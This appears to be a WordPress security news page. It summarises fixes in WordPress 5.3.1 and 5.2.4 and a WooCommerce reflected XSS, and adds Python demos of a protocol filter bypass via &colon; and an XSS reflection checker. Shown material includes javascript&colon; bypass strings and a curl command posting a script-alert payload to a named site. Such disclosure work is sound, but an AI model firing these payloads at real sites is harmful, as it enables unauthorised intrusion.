WordPress 5.3.1 is a security and maintenance release with 46 fixes and enhancements. It also fixes several security problems, reported by the following people:
Daniel Bachhuber, for finding an issue where an unprivileged user could make a post sticky via the REST API.
Simon Scannell of RIPS Technologies, for finding and disclosing an issue where cross-site scripting (XSS) could be stored in well-crafted links.
The WordPress.org Security Team, for hardening wp_kses_bad_protocol() so that it recognises the named colon entity (&colon;), which could otherwise be used to smuggle a disallowed URL scheme such as javascript: past the filter.
Nguyen The Duc, for discovering a stored XSS vulnerability using block editor content.
Do a free scan at wpsec.com to check whether your WordPress installation is safe.
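To see why a named entity matters to a protocol filter, here is an added illustration (not WordPress code, and a simplification of what wp_kses_bad_protocol() actually does): a naive checker that only decodes numeric character references lets javascript&colon;alert(1) through, because it never sees a colon and treats the value as a relative URL; a hardened checker that decodes named references as well catches it. The allowed-scheme list, the helper names and the sample URLs are all assumptions chosen for the demonstration.

```python
import html
import re

# Assumed allow-list for the demo; WordPress has its own list in wp_allowed_protocols().
ALLOWED_PROTOCOLS = {"http", "https", "mailto", "ftp", "tel"}

# Matches decimal (&#58;) and hex (&#x3a;) references only, no named ones.
NUMERIC_ENTITY = re.compile(r"&#(x[0-9a-fA-F]+|[0-9]+);")


def decode_numeric_entities(value: str) -> str:
    """Naive normaliser: decodes numeric references only, so &colon; survives untouched."""
    def repl(match: re.Match) -> str:
        token = match.group(1)
        code = int(token[1:], 16) if token[0] in "xX" else int(token)
        return chr(code)
    return NUMERIC_ENTITY.sub(repl, value)


def decode_all_entities(value: str) -> str:
    """Hardened normaliser: html.unescape knows the HTML5 named set, so &colon; becomes ':'."""
    return html.unescape(value)


def has_bad_protocol(url: str, decode) -> bool:
    """Return True when the URL carries a scheme outside ALLOWED_PROTOCOLS.

    `decode` is the entity normaliser under test. Decoding is repeated until the
    string stops changing so that double-encoded input (&amp;colon;) cannot hide
    the separator, mirroring the loop-until-stable approach kses uses.
    """
    previous = None
    current = url
    while current != previous:
        previous = current
        current = decode(current)
    # Drop whitespace and control bytes, which browsers ignore inside a scheme
    # ("java\tscript:" is still javascript:).
    current = re.sub(r"[\x00-\x20]", "", current)
    if ":" not in current:
        return False  # no separator at all: relative URL, accepted
    scheme, _rest = current.split(":", 1)
    if "/" in scheme:
        return False  # colon occurs inside a path ("/a/b:c"), not a scheme
    return scheme.lower() not in ALLOWED_PROTOCOLS


if __name__ == "__main__":
    # Constructed sample inputs for the demo.
    samples = [
        "https://example.com/",
        "javascript:alert(1)",
        "javascript&#58;alert(1)",
        "javascript&colon;alert(1)",
    ]
    for sample in samples:
        print(f"{sample:32} naive={has_bad_protocol(sample, decode_numeric_entities)!s:5} "
              f"hardened={has_bad_protocol(sample, decode_all_entities)}")
```

The third and fourth samples are the point: both encode the same javascript: URL, but only the numeric form is visible to a normaliser that ignores named references. Any protocol filter that decodes entities must decode the complete named set, or compare against the raw entity forms as well.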

WordPress 5.2.4 is now available. It is a short-cycle security release; the next major release will be version 5.3. This release fixes six security issues. WordPress 5.2.3 and earlier are affected by these bugs, which are fixed in 5.2.4. There are also security updates for WordPress 5.1 and earlier.
List of Security Fixes
Ben Bidner of the WordPress Security Team, who discovered issues related to referrer validation in the admin.
Evan Ricafort, for finding an issue where stored XSS (cross-site scripting) could be added via the Customizer.
J.D. Grimes, who found and disclosed a method of viewing unauthenticated posts.
Weston Ruter, for finding a way to create a stored XSS to inject JavaScript into style tags.
David Newman for highlighting[…]

The popular WooCommerce WordPress plugin, used by 28 percent of all online stores, has just been patched against a reflected cross-site scripting (XSS) vulnerability. The vulnerability was found by SiteLock and disclosed to Automattic, the owner of WooCommerce, via its HackerOne bug bounty program. The fix was released on July 28th; if you use WPScans.com you can scan for this vulnerability, or use our premium version and receive an e-mail warning. The vulnerability can be tested with:
curl -X POST -d 'vendor_description=<script>alert("xss")</script>' "https://steelpress.org/index.php/product-vendor-registration-form/?confirm_email=1&email=1&firstname=1&lastname=1&location=1&register=Register&username=1&vendor_description=1&vendor_name="
Only run this against a site you are authorised to test. The issue is reflected, not stored: the vulnerability is confirmed when the vendor_description value comes back in the response body without HTML escaping, so check the raw response rather than relying on a browser showing an alert.
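Reading the raw response is more reliable than watching for an alert box, so here is an added helper (not SiteLock's or Automattic's code, and not part of the original post) that builds the same form body the curl command sends and classifies how the payload comes back: reflected verbatim (vulnerable), HTML-escaped (patched), or not reflected at all. The two sample responses are constructed for the demonstration and are not captured from any real site; the field names are copied from the curl command above.

```python
import html
from urllib.parse import urlencode

# Payload used by the curl test on this page.
PAYLOAD = '<script>alert("xss")</script>'

# Query-string fields from the curl command (values are the placeholders it uses).
FORM_FIELDS = {
    "confirm_email": "1", "email": "1", "firstname": "1", "lastname": "1",
    "location": "1", "register": "Register", "username": "1",
    "vendor_description": "1", "vendor_name": "",
}


def build_post_body(payload: str = PAYLOAD) -> str:
    """Form-encode the POST body; curl -d sends it raw but the server decodes it the same way."""
    return urlencode({"vendor_description": payload})


def build_query_string(fields: dict = FORM_FIELDS) -> str:
    """Form-encode the query-string part of the curl URL."""
    return urlencode(fields)


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Return 'unescaped' (payload reflected as live markup), 'escaped' or 'absent'."""
    if payload in body:
        return "unescaped"
    escaped_forms = (html.escape(payload, quote=True), html.escape(payload, quote=False))
    if any(form in body for form in escaped_forms):
        return "escaped"
    return "absent"


# Constructed sample responses (not real captures): what a vulnerable and a patched
# registration form might echo back in the vendor_description textarea.
VULNERABLE_RESPONSE = (
    '<textarea name="vendor_description">'
    '<script>alert("xss")</script>'
    "</textarea>"
)
PATCHED_RESPONSE = (
    '<textarea name="vendor_description">'
    "&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;"
    "</textarea>"
)


if __name__ == "__main__":
    print("POST body:", build_post_body())
    print("vulnerable sample:", classify_reflection(VULNERABLE_RESPONSE))
    print("patched sample:", classify_reflection(PATCHED_RESPONSE))
```

A real check would send build_post_body() with the page's URL and feed the response text to classify_reflection(); a response that lands in a <textarea>, as the samples assume, is only exploitable once the payload also closes that element, so the raw classification is the start of the triage, not the end of it.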